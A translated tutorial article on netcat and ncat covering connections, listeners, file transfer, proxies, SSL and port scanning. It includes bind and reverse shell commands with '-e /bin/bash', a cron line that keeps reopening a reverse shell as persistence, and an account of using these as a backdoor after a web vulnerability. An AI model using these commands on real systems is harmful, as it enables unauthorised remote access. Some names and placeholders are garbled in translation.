What is netcat (nc), ncat and how to use it?

16 January 2024 29 minutes Author: Cyber Witcher

The Art of Cyber Security: Unlocking the Potential of Netcat

Netcat is a versatile network tool used to analyze and simulate network protocols, execute commands on a remote machine, and upload and download files. It has two main modes: listening mode and connection mode. Netcat is widely used not only in network administration, but also in pentesting, where it can function as a powerful backdoor. This makes it an indispensable tool for both network professionals and cyber security specialists. Known for its flexibility and power, Netcat is the ideal tool for a variety of networking tasks.

In the article from you will find detailed information about using Netcat, a universal network utility. It covers its applications for analyzing and modeling various network protocols, remote command execution, file transfer, and port forwarding. The article highlights Netcat’s value to network security auditors and pentesters, particularly its functionality as a backdoor tool. It also discusses exploiting vulnerabilities in web applications using Netcat and its two modes: listen and connect. By the way, Netcat is so popular that it is present by default even in some advanced routers – my router has Netcat installed. Of course, you can use Netcat for destructive purposes. This program, for its intended purpose, will be very useful for network administrators and webmasters.

Netcat versions

It so happened that Netcat has many variants written by different authors. The original version was called netcat (nc). It quickly gained recognition, but at some point the author stopped developing it and, despite its popularity, no one else began to support it either. Therefore, the program was rewritten several times by different authors, and sometimes completely from scratch.

netzat (nts)

This is an original program, the last release of which took place in January 2007. Its version is 1.10. On some systems, such as Kali Linux, this version is called nc.traditional:

nc.traditional -h

Will display help for this program and show version [v1.10-41.1]

ntsat

This is a modern version of netcat, written from scratch, without using the code of the original netcat. The authors of ncat are the authors of the famous Nmap program.

Ncat repeats almost all the functionality of the original program and contains additional functions.

Ncat has become an official replacement for the original netcat in some Linux distributions, such as Red Hat Enterprise Linux, CentOS, which are often used as web servers. Therefore, on many computers on the network you will find Ncat – for example, on my virtual hosting, Ncat is installed as Netcat.

Ncat comes in the Nmap package and is therefore available for various platforms, including Windows. That is, to install Ncat on Windows, it is enough to install NMap.

On Kali Linux, Ncat is somehow included in the packages for the i386 architecture and not in the NMap package, so the installation is done like this:

sudo dpkg --add-architecture i386 && sudo apt update
sudo apt install ncat

In Arch Linux, BlackArch and their derivatives, to install Ncat, it is enough to install NMap:

sudo pacman -S nmap
  • gnu-netcat The GNU version of netcat, as described in the “network piping application” description.

  • openbsd-netcat or netcat-openbsd Variant from OpenBSD. As the description says, an army knife for working with TCP/IP.

  • dbd Another Netcat clone designed to be portable and offer strong encryption. It runs on Unix-like operating systems and Microsoft Win32.

  • sbd And another Netcat clone, portable, offers strong encryption among features: AES-128-CBC + HMAC-SHA1 encryption, program execution ( -e ), source port selection, continuous delay reconnection, and more. Or as another description says: a secure backdoor for Linux and Windows.

  • cryptcat A lightweight version of netcat, with twofish encryption added.

  • netrw A netcat-like tool with convenient features for transferring files over the network.

  • webhandler A PHP system function handler, as well as an alternative netcat handler.

Other variants of this classic tool include the amazingly versatile Socat, OpenBSD nc, Cryptcat, Netcat6, pnetcat, SBD, and the so-called GNU Netcat.

On some systems, modified versions or similar netcat utilities use the following command names: nc, ncat, pnetcat, socat, sock, socket, sbd.

So, for your work, you can choose one of these versions that you like the most. When looking for interesting programs on other people’s machines, do not forget about alternative options if netcat itself is not there.

Ncat: your universal network connector

Let’s start with the description of Ncat taken from the official website in order to cover the list of features of this program as fully as possible. And then we’ll move on to concrete practical examples based on different use cases.

Ncat is a general-purpose command-line tool for reading, writing, redirecting, and encrypting data over a network. It is designed to be your Swiss army knife when working on a network, solving a wide range of security testing and administration tasks. Ncat is suitable for interactive use or as a networked backend for other tools. Ncat can:

  • Act as a simple TCP/UDP/SCTP/SSL client to interact with web servers, Telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for troubleshooting, finding security vulnerabilities, or testing user commands) is to interact with it using Ncat. This allows you to monitor every character sent and view raw, unfiltered responses.

  • Act as a simple TCP/UDP/SCTP/SSL server to serve clients or simply to understand what existing clients are doing by capturing every byte they send.

  • Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done with simple forwarding (anything sent to a port is automatically relayed to another location you specify in advance) or as a SOCKS or HTTP proxy for clients to specify their own destinations. In client mode, Ncat can connect to destinations through a chain of anonymous or authenticated proxies.

  • Will work on all major operating systems. There are compiled files for Linux, Windows, and Mac OS X, and in general Ncat can be compiled on most other systems. A reliable tool should be available at all times, regardless of which computer you use.

  • Encrypt communication using SSL and transmit it over IPv4 or IPv6.

  • Act as a network gateway to execute system commands with I/O redirected to the network. The program was designed to work like the Unix cat utility, but for the network.

  • Act as a connection broker, allowing two (or even more) clients to connect to each other through a third (broker) server. It allows multiple machines hidden behind NAT gateways to communicate with each other and also includes a simple Ncat chat mode.

These capabilities become even more powerful and versatile when combined with each other.

Ncat is a modern reincarnation of the venerable Netcat (nc) tool, released by Hobbit in 1996. Although Ncat is similar in spirit to Netcat, they share a common source code. Instead, Ncat uses the well-optimized and tested Nmap network libraries. Compatibility with the original Netcat and some well-known variants is maintained, as long as it does not conflict with Ncat enhancements or cause usability problems. Ncat adds many features not found in the original nc The Hobbit, including support for SSL, proxy connections, IPv6, and brokered connections. The original nc included a simple port scanner, but the Ncat authors did not add this feature.

Principles of operation of Ncat

Ncat has two main modes: connect and listen.

In connection mode, the program connects to network services, which can be another instance of Ncat running, or most other services, such as HTTP (web server), mail server, FTP server, Telnet, and so on. The second mode of operation of Ncat is called listening. In this mode, Ncat waits for a connection from another host.

In this mode, options can be used to enable additional features, such as making Ncat:

  • transmitted the received data to the system as commands for execution

  • returned a file to the connected host (acted as a web server or used to download a file from a remote host)

  • forwarded requests to another port or address

  • worked as a proxy

Moreover, both another instance of Ncat (for example, to transmit commands), and another program, for example, a web browser for viewing or downloading a file, or another program that supports work through a proxy, can connect to Ncat in listening mode.

Connecting to HTTP in Ncat

When connecting to a remote service, you enter the commands (headers) of this protocol in plain text. Let’s consider the HTTP protocol as an example.

Let’s connect to the hackware.ru host on port 80 (this is the HTTP server service):

ncat -C hackware.ru 80

Nothing seems to have happened:

But we actually have an invitation to enter data. We will enter the headers of the HTTP protocol (these are like commands, directives – with these headers we tell the web server what we want from it; headers are also used as a transmitter of meta-information):

GET / HTTP/1.0
Host: hackware.ru

Notice that after the last directive ( Host: hackware.ru ) the ENTER button is pressed twice. The server sent us a response – HTML code.

We sent the correct HTTP headers (requests). In the first one, we specified to use the GET method, to show the main page (/ means a request to the root folder, or we could specify a specific path, such as /index.php), and the HTTP/1.0 protocol version.

Then we used the Host directive and along with it specified the host we were interested in (because the request is made to the remote server by IP, and there are many virtual hosts on that IP). By the way, you can try to make this request without specifying the host or specifying a different host – the received data will be different.

Instead of the GET method, you can use the HEAD method and, for example, make a request to any page:

ncat -C hackware.ru 80

Then:

HEAD /any_page.php HTTP/1.0
Host: hackware.ru

As you can see, using the HEAD method results in only the response headers being displayed.

That is, you can communicate with the web server by editing HTTP directives character by character, sending literally anything. If “on the other side” the role of the web server performs some non-standard solution, then the described method can be used to test what the remote service supports and how it reacts to unusual protocol headers and commands.

It is also possible to test blocking bypass methods by modifying requests within the limits of the protocol, which allows pattern-based DPI systems to pass this traffic to blocked resources. Some of these methods are described in GoodbyeDPI: replacing the word Host in the header with hoSt, removing a space between the header name and the value in the Host header, adding extra spaces between the HTTP method (GET, POST, etc.) and the URI, mixing the case of the value of the Host header, etc. That is, with the help of ncat, you can do low-level checks, debug network filters, and work with remote services. It’s like Assembler, but only for the network.

Moreover, HTTP is given simply as an example – you can work with various services in which headers or commands are plain text.

Let’s go back to our first team

ncat -C hackware.ru 80

In its simplest form, the connection command looks like this:

ncat ХОСТ_ДЛЯ_ПОДКЛЮЧЕНИЯ ПОРТ

We also used the -C option, it includes CRLF replacement. That is, any end-of-line characters we type will be replaced with CRLF. CRLF is required as the end of a line in many protocols, including HTTP, although many servers still accept the normal newline (LF) character. That is, in fact, in this case -C could be dispensed with.

Connecting via SSL (HTTPS) to Ncat

As we can see that in the first case, in the second case we get a 302 Moved Temporarily response code – that is, a redirect to another page is made:

HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Connection: close
Location: https://hackware.ru/any_page.php
Date: Tue, 07 May 2019 02:56:40 GMT
X-Page-Speed: 1.13.35.2-0
Cache-Control: max-age=0, no-cache

As you can tell from the Location directive, we are being redirected to the HTTPS protocol.

In order for Ncat to connect via SSL, you need:

  • specify the –ssl option

  • specify the corresponding port number

For the HTTPS protocol, the standard port is 443, so we connect as follows:

ncat -C --ssl hackware.ru 443

Then:

GET / HTTP/1.0
Host: hackware.ru

As a result, we are shown the HTML code of the requested page:

Ncat listening mode

In this mode, the program starts listening to the specified port, waiting for connections. To enable this mode, just specify the -l option. Optionally, you can specify the IP address of the interface on which to listen (if not specified, binding will be done to all interfaces) and listening port (if not specified, port 31337 is used by default).

To connect to the server, I will need to know the IP address of the remote host, so I start with a command to find it out:

curl suip.biz/ip/
185.26.122.50

We run the program on a remote host in listening mode with binding to port 43210

ncat -l 43210

By the way, we do this in the SSH panel with web access of our hosting – an amazing thing – it works directly from a personal account:

Now I connect from the local computer:

ncat 185.26.122.50 43210

In this example and further, we use the IP address 185.26.122.50 – obviously, in your work you need to change it to the IP address (or hostname) of the machine to which you are connecting. I also use port 43210 – you can choose any other port that is not busy on the remote machine.

You can type text in either of the ncat windows (server or client) and it will be displayed in another window with a connected ncat instance.

The essence of the work is very simple – the entered text is transferred from one window to another and output to the standard output – this is the default behavior of the program. With the help of other options, you can set up more interesting options for activities – for example, to transfer the sent text to the operating system to execute commands.

Running commands through ncat

The -e Ncat listener can be used to connect to a program that it will pass commands to execute. As a special case, you can specify “/bin/bash” as such a command, meaning that all lines passed will be sent to the Bash shell.

On the remote server, run Ncat as follows:

ncat -l -e "/bin/bash" 43210

And we connect from the local computer:

ncat 185.26.122.50 43210

In the local ncat, we execute:

cd hackware.ru/logs
ls -l

And I received a list of files on the remote computer. That is, the commands are executed by analogy with SSH.

To maintain websites, you can directly enter various commands in the local console, for example, make backup copies, download installation files from official websites directly to the server, and not through your computer.

Well, the backdoor functions are also contained in the same command — if there is a vulnerability on the site that allows the execution of system-level commands, then a corresponding request to the page is generated, so that as a result, ncat is launched with the transmission of commands to the OS. Then the attacker connects to the server (to ncat) directly, bypassing the vulnerable site, in order to send commands to it. If the commands are to be executed on a Windows system, the following option must be specified: -e cmd.exe

Connecting to Ncat if the remote machine is behind NAT

If the remote machine is behind a NAT, then it is impossible to connect to it (an explanation of this is here ). But with the help of Ncat, you can set up a connection between machines, one of which is behind NAT. That is, the final result will be as if connected to the computer via NAT. In this case, we specify the options a little differently.

Run it on your local computer

ncat -l 43210

Note that we’ve enabled listening but not passing commands to the shell, because no commands need to be executed on the local computer!

And on the remote computer, we run the program like this:

ncat -e "/bin/bash" ХОСТ 43210

Instead of HOST, it should contain the IP address or hostname of the local computer on which ncat is running in listening mode. Also, the -e “/bin/bash” option is specified on the remote computer, which will allow the sent commands to be executed. With this, we will achieve a connection with the computer behind NAT and the ability to execute commands on it.

How to make sure that closing the Ncat client does not disable the Ncat server

Pressing CTRL+c or CTRL+d in the client console will close as Ncat on the local machine, as well as the connected Ncat. If you want to keep Ncat on the server from closing, use the –keep-open option:

ncat -l -e "/bin/bash" --keep-open 43210

Now if you connect to the remote computer:

ncat 185.26.122.50 43210

And then close the connection to Ncat in listening mode, then the instance of Ncat on the remote system will continue its work and you can connect to Ncat acting as a server again.

How to transfer files to a remote computer

You can use Ncat to upload files to a remote server. For example, I need to send some_stuff.txt file. Then on the server (where the file will be uploaded), I run:

ncat -l 43210 > some_stuff.txt

And on the local computer (from which the file will be downloaded), I run:

ncat 185.26.122.50 43210 < some_stuff.txt

When the transfer is complete, both ncat sessions are terminated.

How to download a file from a remote computer

Let’s say I need to download the file some_stuff.txt from a remote computer. Then on the server we run:

ncat -l 43210 < some_stuff.txt

And on the local computer where the file will be downloaded, I run Ncat like this:

ncat 185.26.122.50 43210 > some_stuff.txt

Note that nothing will be displayed and after the file is downloaded, both instances of Ncat will continue to run.

How to make a web server with Ncat

Actually, it will be a single file web server, but it’s still an interesting possibility. So, let’s create a hello.http file and add the following content to it:

HTTP/1.0 200 OK


<html>
  <body>
    <h1>Hello, world!</h1>
  </body>
</html>

Let’s run on the Ncat server:

ncat -l 43210 < hello.http

In a web browser, open the address of the remote host with an indication of the port: http://185.26.122.50:43210

By the way, ncat on the server will show exactly which headers the web browser sent:

Another example from the official ncat manual:

nc -lk -p 8080 --sh-exec "echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html"

Or, if you’re a Windows user:

ncat -lk -p 8080 --sh-exec "echo HTTP/1.1 200 OK& echo(&type index.html"

These commands will start an HTTP server that makes the index.html file available from the current working directory. To open this file, visit http://localhost:8080/ in your browser. If you specify -p 80 instead of -p 8080 , you can remove :8080 from the URL. Note that this file will be sent regardless of the requested URL – to change the file that is sent, you need to change the Ncat command or use the httpd.lua script.

How to use Ncat to access services available only on the local network

Any non-network program can be made available over the network using the –sh-exec option already discussed. However, due to the peculiarities of input-output (buffering and so on), not all programs will work well in interactive mode.

Let’s consider another option: initially, the network program is configured to listen only to the local address (localhost) and it is impossible to connect to it from outside (from a remote computer). The most common example is the MySQL DBMS. This service is network-based, and other programs (for example, the PHP script handler) communicate with it over the network. But many system administrators configure MySQL so that it can be accessed from a local computer, but not from a remote computer. As a result, the following is achieved: websites, including those that use MySQL databases, work normally, without changes, because the connection to MySQL is performed locally anyway; but the attacker cannot connect to MySQL (for example, to retrieve a password). True, in this case, the possibility of remote maintenance of MySQL by a legitimate system administrator or webmaster becomes unavailable.

With the help of Ncat, you can solve this problem – make MySQL available for a remote connection again for a while. This is achieved by Ncat’s ability to redirect traffic.

Let’s start by using Whatportis to remember which port MySQL is using:

whatportis mysql
+-------+------+----------+-------------+
| Name  | Port | Protocol | Description |
+-------+------+----------+-------------+
| mysql | 3306 |   tcp    | MySQL       |
| mysql | 3306 |   udp    | MySQL       |
+-------+------+----------+-------------+

Now, on the server where only the locally available service is running, run a command like this:

ncat --sh-exec "ncat КОНЕЧНЫЙ_IP КОНЕЧНЫЙ_ПОРТ" -l ПРОСЛУШИВАЕМЫЙ_ПОРТ --keep-open

Here:

  • END_IP is the address to which the redirect will be made

  • END_PORT is the port to which the redirect will be made

  • RECEIVED PORT is the port on the server that we will connect to from our local computer

Moreover, the FINAL IP can be a local address, in this case we use 127.0.0.1. So the command I run on the server:

ncat --sh-exec "ncat 127.0.0.1 3306" -l 43210 --keep-open

On the local computer, run:

mysql -h IP -u ПОЛЬЗОВАТЕЛЬ -p -P ПОРТ --protocol=tcp

Here:

  • IP is the address of the server where the network service is only available locally

  • USER is the MySQL username

  • PORT – The port number that ncat is listening on

  • The -p option means prompt for the user’s password

  • –protocol=tcp – means that the TCP protocol will be used (this is not fundamental, you can also use UDP – the main thing is to specify the appropriate option in ncat, which can work with UDP as well, but uses TCP by default)

As you can see, everything works:

Using SSH through an Ncat tunnel

With Ncat and OpenSSH, you can make an SSH connection to a host behind a NAT router without the need to forward (wake up) ports on the router. The router must have Ncat installed. This command shows how to SSH to <host> via <router>:

ssh -o ProxyCommand="ssh -q <роутер> ncat %h %p" <хост>

The ProxyCommand option in ssh tells how to open an SSH connection to <host>. It does this by opening another SSH session to <router> and connecting it to <host> with Ncat.

If your SSH server administrator has not disabled tunneling (which is enabled in most configurations), you can use SSH’s built-in proxy server. Use the following command to open a proxy server on TCP port 8080 of your local machine that tunnels traffic over an SSH connection:

ssh router -D 8080

You can now make connections within the network using the proxy capabilities of the Ncat client. For example, to connect to a host with an IP address of 192.168.1.123, that is behind your router, you can use the following command if you have opened a tunnel:

ncat --proxy localhost:8080 --proxy-type socks4 192.168.1.123

How to turn Ncat into a proxy

Ncat can perform its connections through a proxy, the following types are supported: SOCKS 4, SOCKS 5 and HTTP. More information about proxy connection options can be found on the Ncat help page: https://kali.tools/?p=4578

I propose to consider a more interesting option — turning Ncat itself into a proxy. As a proxy, Ncat only supports the HTTP type.

HTTP proxy creation is supported both before and without authentication:

ncat -l 3128 --proxy-type http
ncat -l 3128 --proxy-type http --proxy-auth <пользователь>:<пароль>

Here:

  • -l – Enables listening mode

  • 3128 means listen on the specified port number

  • –proxy-type http means to select the proxy type

  • –proxy-auth <user>:<password> – Sets the proxy authentication credentials

For example, we run a proxy server on our hosting:

ncat -l 43210 --proxy-type http --proxy-auth user:pass

Now in the web browser settings, we specify the appropriate IP and port that ncat listens on, and also check the box to use this proxy for all connections:

I open a site where you can check your IP: https://suip.biz/ru/?act=myip Credentials for proxy authorization are immediately requested:

And instead of the real IP, the address of the hosting, which we use as a proxy with the help of Ncat, is now shown:

In listening mode, if no port is set, 31337 will still be used instead of other popular proxy ports. The proxy supports GET, HEAD, and POST methods in web surfing, as well as the CONNECT method, which allows tunneling arbitrary TCP connections (when Ncat connects as a client, it uses CONNECT).

Basic and Digest authentication schemes are supported for HTTP, both client-side and server-side. Digest is safer, so if available, Ncat will be preferred over Basic. The server offers clients both schemes. Basic sends credentials in the clear, Digest does not. The Digest Ncat implementation allows replay attacks for up to 10 seconds (with Basic, replay attacks and other attacks are always possible).

Warning from Ncat authors: The HTTP proxy raised by Ncat is designed to keep you out of the way and help you create temporary network connections. It should not be used as an everyday Internet-facing proxy. You can limit who can connect using the –allow, –deny, and –proxy-auth options, but this is not a strong form of authentication. An unauthenticated proxy is dangerous because it can be used by others to launch attacks and help them avoid detection. The CONNECT capability is particularly dangerous because it involves traffic of any kind, not just HTTP.

How to allow connections to Ncat from specific IPs

Ncat has an access control mechanism that allows you to configure a listening Ncat so that only certain IPs can connect to it, or that certain IPs are blocked from connecting. This is achieved using the options:

  • –allow

  • –allowfile

  • –deny

  • –denyfile

Sending mail

This is another example that demonstrates how Ncat can be used to work with application layer protocols.

It’s a lot of fun interacting with text-based network protocols using just Ncat and a keyboard. Here’s a quick example that shows how to send email by communicating with an SMTP server. SMTP is described in RFC 5321, but you don’t need to know much about the protocol to send a simple message. The port number assigned to the service is 25, and we use -C because it requires the CRLF line to end. The example contains a session transcript.

example. Ncat as a mail client:

ncat -C mail.example.com 25
220 mail.example.com ESMTP
HELO client.example.com
250 mail.example.com Hello client.example.com
MAIL FROM:[email protected]
250 OK
RCPT TO:[email protected]
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
From: [email protected]
To: [email protected]
Subject: Greetings from Ncat


Hello. This short message is being sent by Ncat.
.
250 OK
QUIT
221 mail.example.com closing connection

To make this example work for you, change mail.example.com to your SMTP server and client.example.com to your domain name. Of course, you’ll want to change email addresses and messages too. It will probably only work if you use a regular mail server with your real email address, or if you use the recipient’s mail server (look up the MX record for the domain name at their email address).

Obviously, this technique can be used for more than just sending mail. Ncat is a great interactive debugging tool for any text protocol. This debugging is sometimes done using the telnet command because it provides something like a raw text stream. However, Ncat offers several advantages over Telnet. Ncat does not print anything except what is sent by the remote host. Telnet is not suitable for arbitrary binary data because it reserves some bytes as control characters. The telnet command terminates when it finishes typing, so you may not see what is sent from the other end. Finally, Telnet cannot use UDP.

Creating chains of serial transmission of traffic between several Ncats

Ncat is designed to work in the input and output stream of other utilities (pipeline), so it is natural that the output from one instance of Ncat can be fed to the input of another. The following is an example of one of the ways to send a log file from host1 to host3 via host2:

On host host3:

ncat -l > log.txt

On host host2:

ncat -l | ncat host3

On host host1:

ncat --send-only host2 < log.txt

A possible problem with this method is that it is one-way: host1 can send to host3, but host3 cannot send anything back to host1. In this case it doesn’t matter, but you can set up two-way communication if you want, for example:

On host host3:

ncat -l > log.txt

On host host2:

ncat -l --sh-exec "ncat host3"

On host host1:

ncat --send-only host2 < log.txt

Ncat listening on host2, after receiving a connection, creates a new Ncat to communicate with host 3 and connects the inputs and outputs of the programs running on host 1 and host 3 together. The same trick can be used on the local host. In this example, local port 8080 is forwarded to the web server at example.org:

ncat -l localhost 8080 --sh-exec "ncat example.org 80"

Cleanup from SSL

Let’s say you want to connect to an IMAP server that requires SSL, but your mail reader doesn’t support SSL. Ncat can act as an encrypted bridge between the client and the server. You connect the mail client to a local port and Ncat forwards the encrypted traffic to the server. Here’s how to connect IMAP (port 143) on localhost to IMAP over SSL (port 993) on imap.example.com.

ncat -l localhost 143 --sh-exec "ncat --ssl imap.example.com 993"

Once this happens, instruct the mail client to connect to the IMAP server on the local host.

This technique works for protocols that transfer traffic between two hosts. It doesn’t work well for HTTP because HTTP usually knows hostnames and often involves multiple hosts.

Ncat as an SSL server

The option of using Ncat in HTTPS and SSL connection mode has already been discussed above.

Ncat server mode can also use SSL. Server mode provides a certificate that the client can verify.

If you run the SSL server without the –ssl-cert –ssl-key options, Ncat will automatically generate a certificate and a 1.024-bit RSA key. Of course, such a certificate will not be trusted by any program that performs certificate verification. In verbal mode, a key print will be printed, so you can perform manual verification if you wish.

Example of automatic certificate generation:

ncat -v --listen --ssl


Ncat ( https://nmap.org/ncat )
Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
SHA-1 fingerprint: F0:13:BF:FB:2D:AA:76:88:22:60:3E:17:93:29:3E:0E:6B:92:C0:2F

It is recommended to use an existing certificate and key whenever possible, as it provides reliable server authentication. Use the –ssl-cert and –ssl-key options to specify files in PEM encoding. For testing purposes, you can generate a self-signed certificate and private key. If you have OpenSSL installed, use this command:

openssl req -new -x509 -keyout test-key.pem -out test-cert.pem

For certificate verification purposes, the commonName in the certificate must match the fully qualified domain name of the host where the server is running. After creating these files, start the server:

ncat --listen --ssl --ssl-cert test-cert.pem --ssl-key test-key.pem

To establish a verified client connection, copy the test-cert.pem file somewhere the client can access it, then run:

ncat --ssl-verify --ssl-trustfile test-cert.pem

Port scanning

Ncat doesn’t support this feature, but the original nc can scan ports.

To start a TCP port scanner in the range [StartPort] to [EndPort]:

nc -v -n -z -w1 [Целевой_IP] [начальныйПорт]-[конечныйПорт]

Pinning to a remote machine

On the remote machine, set ncat to run with Cron every 10 minutes:

crontab -e
*/10 * * * * ncat IP 43210 -e /bin/bash

Emulation of diagnostic services

Since Ncat can act as a server that accepts anything and outputs it to the screen (or saves it to a file), we can run Ncat in listening mode, and in the program whose network activity we are interested in, we can specify the address of Ncat. As a result, the program will contact Ncat, and in turn Ncat will show us everything that the program sent to it.

Let’s say I’m wondering what kind of query the dig command sends – this command is used to convert hostnames to IP addresses and back. I know it uses UDP on port 53 by default. Therefore, on our computer, we run ncat with the -l option (includes listening), with the -u option (means to use the UDP port) and specifying port 53:

sudo ncat -l -u 53

On the same computer, in another console, we make a request, where I specify localhost as the server to which the program should contact:

dig hackware.ru @localhost

As it turns out, dig uses binary data instead of plain text, so the ncat console displays unreadable characters. Although even so it is clear that the domain is transmitted in the form of plain text (almost) and 3 attempts are made. By the way, Ncat has options to save binary data. That is, if desired, the modem can save them correctly and then analyze them in the hexadecimal editor.

Conclusion

This article covers many examples of Ncat usage, but not all. You can learn about other Ncat options on our website under the link Kali Linux Tools. (Ncat, Netcat, nc). As for Ncat use cases, there may be even more. Do not forget about the possibility of combining the functions of this utility.

The article is made for educational purposes

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.